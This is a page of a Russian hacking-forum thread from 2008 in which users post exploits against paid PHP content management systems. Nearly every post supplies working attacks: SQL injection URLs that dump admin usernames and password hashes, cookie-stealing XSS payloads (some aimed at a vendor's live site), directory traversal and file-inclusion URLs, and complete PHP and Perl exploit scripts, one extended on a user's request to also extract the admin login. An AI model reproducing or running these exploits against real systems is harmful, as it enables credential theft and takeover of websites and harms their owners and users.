ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
Перезагрузить страницу Обзор уязвимостей в платных CMS
   
Ответ
Страница 3 из 6 < 1 2 3 4 5 6 >
 
Опции темы Поиск в этой теме Опции просмотра

  #21  
Старый 03.08.2008, 17:35
Аватар для Corwin
Corwin
Познающий
Регистрация: 01.08.2008
Сообщений: 42
Провел на форуме:
670601

Репутация: 50
По умолчанию
================================================== ==============================
|| Recipe Script SQL-INJECTION
================================================== ==============================

Application: Recipe Script
------------

Version: 6.0
--------

Website: http://fivedollarscripts.com
--------

Demo: http://recipebag.com
-----

Date: 03-08-2008
-----

[ VULNERABLE CODE ]

viewrecipe.php

PHP код:
 3:     $sql="select * from recipe where recipeid=$recid";
    4:     $res=mysql_query($sql);it");

  259:     $result=mysql_query("select from recipescomments where approved='Y' and recipeid=$recid");
  260:     if(mysql_num_rows($result))do it"); 

===>>> Exploit:

http://host/blabla-0 union select 1,2,concat(username,0x3a,password),4,5,6,7,8,9,1,2 ,3,4,5,6,7,8,9 from recipesadmin.php

// Admin Login - http:/host/admin2

Greetzz !!! Форб, с отцовством бро! :-)!!


Author: Corwin
-------

Contact: corwin88[dog]mail[dot]ru
--------
Последний раз редактировалось Corwin; 03.08.2008 в 17:48..
 
Ответить с цитированием

  #22  
Старый 04.08.2008, 10:48
Аватар для Corwin
Corwin
Познающий
Регистрация: 01.08.2008
Сообщений: 42
Провел на форуме:
670601

Репутация: 50
По умолчанию
================================================== ==============================
|| Bartender Drinks SQL-INJECTION
================================================== ==============================

Application: Bartender Drinks
------------

Version: All
--------

Website: http://fivedollarscripts.com
--------

Demo: http://fivedollarscripts.com/drinks/
-----

Date: 04-08-2008
-----

[ VULNERABLE CODE ]

viewdrinks.php

PHP код:
 6:  if($bgid=="")
        {
        $sql="select * from drink order by upldate desc";
        }
        else
        {
   12:  $sql="select * from drink where categoryid=$bgid order by upldate desc";
        } 

viewdrink.php

PHP код:
 3:  $sql="select * from drink where drinkid=$recid";
        $res=mysql_query($sql);


  238:  $result=mysql_query("select * from drinkscomments where approved='Y' and drinkid=$recid"); 

===>>> Exploit:

http://host/index.php?cmd=6&recid=-1 union select 1,2,concat(username,0x3a,password),4,5,6,7,8,9,1,2 ,3 from drinksadmin/*

// Admin Login - http:/host/admin2


by me
 
Ответить с цитированием

Ultraseek
  #23  
Старый 11.08.2008, 14:12
Аватар для baltazar
baltazar
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122

Репутация: 2438
Отправить сообщение для baltazar с помощью ICQ
По умолчанию Ultraseek
XSS:

Код:
http://site/highlight/index.html?url=http://forum.antichat.ru.html&fterm=test&la=en&charset=utf-8&search=../query.html%3Fcharset%3Dutf-8%26qt%3Dtest
Directory Traversal:

http://site/help/syntax.html?la=/../../index

http://site/help/searchtips.html?la=/../../index

http://site/help/refine.html?la=/../../index

http://site/help/special.html?la=/../../index

http://site/help/boolean.html?la=/../../index

http://site/help/meta.html?la=/../../index

Local File Inclusion:

http://site/help/syntax.html?la=/../query

http://site/help/searchtips.html?la=/../query

http://site/help/refine.html?la=/../query

http://site/help/special.html?la=/../query

http://site/help/boolean.html?la=/../query

http://site/help/meta.html?la=/../query
 
Ответить с цитированием

CMS SiteEdit
  #24  
Старый 11.08.2008, 14:23
Аватар для baltazar
baltazar
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122

Репутация: 2438
Отправить сообщение для baltazar с помощью ICQ
По умолчанию CMS SiteEdit
XSS:

Код:
http://site/shop?se_namedomen=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Уязвимость в скрипте shop в параметре se_namedomen

Код:
http://site/thanks?formobj_email=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
В скрипте thanks в параметрах formobj_email, formobj_message, formobj_edit, formobj_name, formobj_company, formobj_jobtitle, formobj_site, formobj_address, formobj_telephone, formobj_img, formobj_GoTo, autoreply_text

Код:
http://site/registration?login=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
В скрипте registration в параметрах login, email, first_name, last_name.


Уязвимости на офф.сайте движка http://www.siteedit.ru


Код:
http://www.siteedit.ru/thanks?autoreply_text=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://www.siteedit.ru/thanks?autoreply_text=%22%3E%3Ca%20href=http://forum.antichat.ru%3Eantichat%3C/a%3E
Код:
http://www.siteedit.ru/registration?last_name=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
 
Ответить с цитированием

  #25  
Старый 18.08.2008, 05:38
Аватар для Qwazar
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912

Репутация: 4693


Thumbs up
SoSo News Express Pro 2.0.4. Blind SQL Injection Exploit (к сожалению, поковыряться удалось только в этой версии)

Уязвимый код:
В файле includes/info_home.php:
Код:
$this->client_ip=!empty($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : ( !empty($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : (!empty($REMOTE_ADDR) ? $REMOTE_ADDR : '' ));
В файле modules/ajax/ajax_statistic.php:
Код:
$DB->query("SELECT session_time FROM ". $DB->prefix ."stat_session WHERE client_ip='". $Info->client_ip ."' AND session_time>=". $update_time ." ORDER BY session_time DESC LIMIT 0,1");
Как видим, поле X_FORWARDED_FOR заголовка запроса, не фильтруется.

Т.к. полученый Sql inj - слепой, но с выводом ошибки, используем запрос:
Код:
X_FORWARDED_FOR:-1' OR client_ip=IF(ascii(substring((SELECT user_password FROM news_user WHERE user_id=1),[POS],1))=[CHARCODE],'1',(SELECT 1 UNION SELECT 2))/*
Если запрос, НЕ вернул ошибку "Subquery returns ...", то на этой позиции находится символ [CHARCODE].

Сплоит запускать из коммандной строки, вот так: soso2sql.php http://site.com/ 1

Результат: md5(password).

Собственно код:
Код:
<?

//SoSo News Express Pro v.2.0.4 Blind SQL Injection Exploit by Qwazar
//Greets: antichat.ru & Orgasm at #antichat
$prefix="news_";

set_time_limit(0);
ignore_user_abort(1);

function send_xpl($url, $xpl){
	global $id;
	global $cookie;
	$u=parse_url($url);
	$req ="GET ".$u['path']."ajax.php?mod=ajax_statistic HTTP/1.1\r\n";
	$req.="Host: ".$u['host']."\r\n";
	$req.="X_FORWARDED_FOR: ".$xpl."\r\n";
	$req.="Connection: Close\r\n\r\n";
	$fs=fsockopen($u['host'], 80, $errno, $errstr, 30) or die("error: $errno - $errstr<br>\n");
	fwrite($fs, $req);
	while (!feof($fs)) {
  		$res .= fread($fs, 8192);
	}
	fclose($fs);
	return $res;
}

function xpl($condition, $pos){
	global $id, $prefix;
	$xpl="-1' or client_ip=if(ascii(substring((select user_password from ".$prefix."user where user_id=$id),$pos,1))$condition,'1',(select 1 union select 2)) /* ";
	return $xpl;
}

if($argc<2)
{
echo "==================\r\n";
echo "Using soso2sql.php url target_id\r\n  target_id - id of target member\r\n\r\n\r\nEx.: soso2sql.php http://www.site.com/ 1\r\n";
echo "==================\r\n";
die();
}

$url=$argv[1];
$id=$argv[2];

echo $url."\r\n";

echo "Trying to get passhash: ";
//get md5 pass
for($i=1;$i<=32;$i++){	
	$flag = 0;
	for($j=48;$j<=57;$j++){
		if(!preg_match('/Subquery returns/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); if($j!=48) {echo chr(8);} echo chr($j); $flag=1; break; }
		else {if($j!=48) {echo chr(8);} echo chr($j);}
	}
	if($flag!=1) {
		for($j=97;$j<=102;$j++){
			if(!preg_match('/Subquery returns/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); echo chr(8).chr($j); $flag=1; break; }
			else {echo chr(8).chr($j);}
		}
	}
	if (!$flag)
		die("\r\nExploit failed\r\n");
}

echo " [DONE]\r\n";

?>
Скачать можно тут: http://www.x2b.ru/get/1401

З.Ы.
Проблема с X_FORWARDED_FOR присутствует и на официальном сайте, а значит наверняка и в более новых версиях.

Пример:

Цитата:
GET http://www.sosovn.com/index.php?mod=contact&act=send
Host: www.sosovn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
X_FORWARDED_FOR: test'
Keep-Alive: 300
Connection: keep-alive
Ну и раскрытие пути: http://site/ajax.php (для версии 2.0.4)
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.
 
Ответить с цитированием

  #26  
Старый 18.08.2008, 23:58
Аватар для Zahar
Zahar
Новичок
Регистрация: 17.03.2008
Сообщений: 5
Провел на форуме:
168509

Репутация: 1
По умолчанию
Огромное спасибо за выложеный баг. Я правда столкнулся с проблемой нахождения логина, пока не очень получаеться, немогли бы вы показать как вытащить логин админа?
спасибо!
Последний раз редактировалось jokester; 25.02.2009 в 23:18.. Причина: чистка темы
 
Ответить с цитированием

  #27  
Старый 19.08.2008, 00:33
Аватар для Qwazar
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912

Репутация: 4693


По умолчанию
Вот тебе версия которая после подбора хеша подбирает и логин админа. Подбирает в диапазоне [a-Z,0-9], если будет мало, внимательно поправь значения кодов символов во втором цикле for (в тех что внутри for($i=1;$i<=32;$i++) ).

Код:
<?

//SoSo News Express Pro v.2.0.4 Blind SQL Injection Exploit by Qwazar
//Greets: antichat.ru & Orgasm at #antichat
$prefix="news_";

set_time_limit(0);
ignore_user_abort(1);

function send_xpl($url, $xpl){
	global $id;
	global $cookie;
	$u=parse_url($url);
	$req ="GET ".$u['path']."ajax.php?mod=ajax_statistic HTTP/1.1\r\n";
	$req.="Host: ".$u['host']."\r\n";
	$req.="X_FORWARDED_FOR: ".$xpl."\r\n";
	$req.="Connection: Close\r\n\r\n";
	$fs=fsockopen($u['host'], 80, $errno, $errstr, 30) or die("error: $errno - $errstr<br>\n");
	fwrite($fs, $req);
	while (!feof($fs)) {
  		$res .= fread($fs, 8192);
	}
	fclose($fs);
	return $res;
}

function xpl($condition, $pos){
	global $id, $prefix;
	$xpl="-1' or client_ip=if(ascii(substring((select user_password from ".$prefix."user where user_id=$id),$pos,1))$condition,'1',(select 1 union select 2)) /* ";
	return $xpl;
}

function xpl2($condition, $pos){
	global $id, $prefix;
	$xpl="-1' or client_ip=if(ascii(substring((select username from ".$prefix."user where user_id=$id),$pos,1))$condition,'1',(select 1 union select 2)) /* ";
	return $xpl;
}

if($argc<2)
{
echo "==================\r\n";
echo "Using soso2sql.php url target_id\r\n  target_id - id of target member\r\n\r\n\r\nEx.: soso2sql.php http://www.site.com/ 1\r\n";
echo "==================\r\n";
die();
}

$url=$argv[1];
$id=$argv[2];

echo $url."\r\n";

echo "Trying to get passhash: ";
//get md5 pass
for($i=1;$i<=32;$i++){	
	$flag = 0;
	for($j=48;$j<=57;$j++){
		if(!preg_match('/Subquery returns/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); if($j!=48) {echo chr(8);} echo chr($j); $flag=1; break; }
		else {if($j!=48) {echo chr(8);} echo chr($j);}
	}
	if($flag!=1) {
		for($j=97;$j<=102;$j++){
			if(!preg_match('/Subquery returns/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); echo chr(8).chr($j); $flag=1; break; }
			else {echo chr(8).chr($j);}
		}
	}
	if (!$flag)
		die("\r\nExploit failed\r\n");
}
echo " [DONE]\r\n";

echo "Trying to get username: ";
for($i=1;$i<=32;$i++){
	$flag = 0;
	for($j=48;$j<=57;$j++){
		if(!preg_match('/Subquery returns/', send_xpl($url, xpl2('='.$j,$i)))){ $secret.=chr($j); if($j!=48) {echo chr(8);} echo chr($j); $flag=1; break; }
		else {if($j!=48) {echo chr(8);} echo chr($j);}
	}
	if($flag!=1) {
		for($j=65;$j<=90;$j++){
			if(!preg_match('/Subquery returns/', send_xpl($url, xpl2('='.$j,$i)))){ $secret.=chr($j); echo chr(8).chr($j); $flag=1; break; }
			else {echo chr(8).chr($j);}
		}
	}
	if($flag!=1) {
		for($j=97;$j<=122;$j++){
			if(!preg_match('/Subquery returns/', send_xpl($url, xpl2('='.$j,$i)))){ $secret.=chr($j); echo chr(8).chr($j); $flag=1; break; }
			else {echo chr(8).chr($j);}
		}
	}
	if($flag!=1) {
		echo chr(8);
		break;
	}
} 

echo " [DONE]\r\n";

?>
Скачать можно с: http://www.x2b.ru/get/1426
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.
 
Ответить с цитированием

CustomCMS 4.0 (CCMS) print.php Remote SQL Injection Vulnerability
  #28  
Старый 22.08.2008, 23:02
Аватар для ~!DoK_tOR!~
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию CustomCMS 4.0 (CCMS) print.php Remote SQL Injection Vulnerability
print.php

Vuln code:

PHP код:
$q mysql_query("SELECT * from ccms_news_comments WHERE w_id='$id'"); 
magic_quotes_gpc = Off

http://localhost/[installdir]/

Exploit:

Код:
print.php?id='+union+select+1,concat_ws(0x3a,usern ame,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21+from+ccms_user+where+userid=1/*
http://milw0rm.com/exploits/6284
(c) ~!Dok_tOR!~
Последний раз редактировалось ~!DoK_tOR!~; 25.08.2008 в 05:58..
 
Ответить с цитированием

  #29  
Старый 04.09.2008, 07:09
Аватар для ~!DoK_tOR!~
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию
PlayCMS <= 2.0 SQL Injection

Type: Game Script
Price: $20
URL: www.playcms.com
Condition: magic_quotes_gpc = Off

Exploit:

http://localhost/[installdir]/game.php?gameid=-1'+union+select+1,user(),version(),4,5,6,database( ),8/*

http://localhost/[installdir]/index.php?gameid=-1'+union+select+1,2,3,4,5,6,7,8/*

(c) ~!Dok_tOR!~
 
Ответить с цитированием

  #30  
Старый 06.09.2008, 13:27
Аватар для ZAMUT
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523

Репутация: 1174
По умолчанию
Vastal I-Tech CMS

Оф.сайт: vastal.com

Дата: 05.09.2008
Первоисточник: milw0rm.com
Описание:
Уязвимость существует из-за недостаточной фильтрации входящего параметра, передаваемого через $_GET массив,
атакуещему позволяет провести SQL - инъекцию.
Способы устранения уязвимости:
проводить жесткую фильтрацию параметров перед передачей их в SQL - запрос.
Подробнее:
Анти SQL-injection
Защита от SQL-injection
Уязвимые компоненты:
Shaadi Zone 1.0.9 (tage) SQL Injection
Cosmetics Zone (cat_id) SQL Injection
Freelance Zone (coder_id) SQL Injection
Mag Zone (cat_id) SQL Injection
MMORPG Zone (game_id) SQL Injection
Jobs Zone (news_id) SQL Injection
DVD Zone (cat_id) SQL Injection
Share Zone (id) SQL Injection
Toner Cart (id) SQL Injection
Visa Zone (news_id) SQL Injection
Agent Zone (ann_id) SQL Injection
От меня:
Компонент: Mag Zone (mag_id)
Код:
#!/usr/bin/perl

use LWP::UserAgent;
use strict;

my ($ua,$answ);

&usage;

if(!$ARGV[2]) {print "\n\nProxy not found :d";}
else {print "\n\nProxy found, $ARGV[2]";}

print "\n\n[~]Waiting...\n[~]Getting data -- [ user_name, password ]";
$ua=LWP::UserAgent->new;
$ua->agent("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727");
if($ARGV[2]){
	        $ua->proxy('http',"http://".$ARGV[2]."/");
		  }

$answ = $ua->get("http://$ARGV[0]/view_mag.php?mag_id=-1+union+select+1,2,3,concat(0x3a3a3a,user_name,0x3a,password,0x3a3a3a),5,6,7,8,9,10,11,12,13,14,15,16,17+from+members/*")->content;
$answ =~m#:::(.+):(.+):::#;
if(!$1) {print "\nExploit failed!";}
else { print "\n\nlogin : $1\npassword : $2\n"; }

sub usage
{
    print q
    {
     ######################################################################
              Vastal I-Tech Mag Zone (mag_id) SQL Injection Exploit   
      
	 INFO:
	    Author: ZAMUT
	    Vuln: mag_id=
	    Homepage: http://antichat.ru

     Usage: exploit.pl [path] [proxy]
     Example:
     perl exploit.pl www.vastal.com/mag 62.123.110.134:8080 
     ######################################################################
    };

}
Используется так:
perl exploit.pl [полный путь до скрипта] [прокси:порт]
Пример:
perl exploit.pl www.vastal.com/mag 62.123.110.134:8080 или
perl exploit.pl www.vastal.com/mag
Поддержка только http - прокси.
__________________
в строю
Последний раз редактировалось ZAMUT; 06.09.2008 в 14:44..
 
Ответить с цитированием
Ответ
Страница 3 из 6 < 1 2 3 4 5 6 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор уязвимостей WordPress ] ettee Сценарии/CMF/СMS 156 07.06.2010 05:01
CMS vs "изготовление на коленках" vadim_samoilov Чужие Статьи 8 19.08.2008 02:10
[ Обзор уязвимостей miniBB ] -=lebed=- Форумы 3 12.01.2008 20:57
Статья обзор уязвимостей бесплатных почтовых сервисов markel E-Mail 3 12.09.2005 10:07
Обзор рынка взломщиков электронной почты, март2004 Игорь Белкин E-Mail 5 25.03.2004 12:32



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ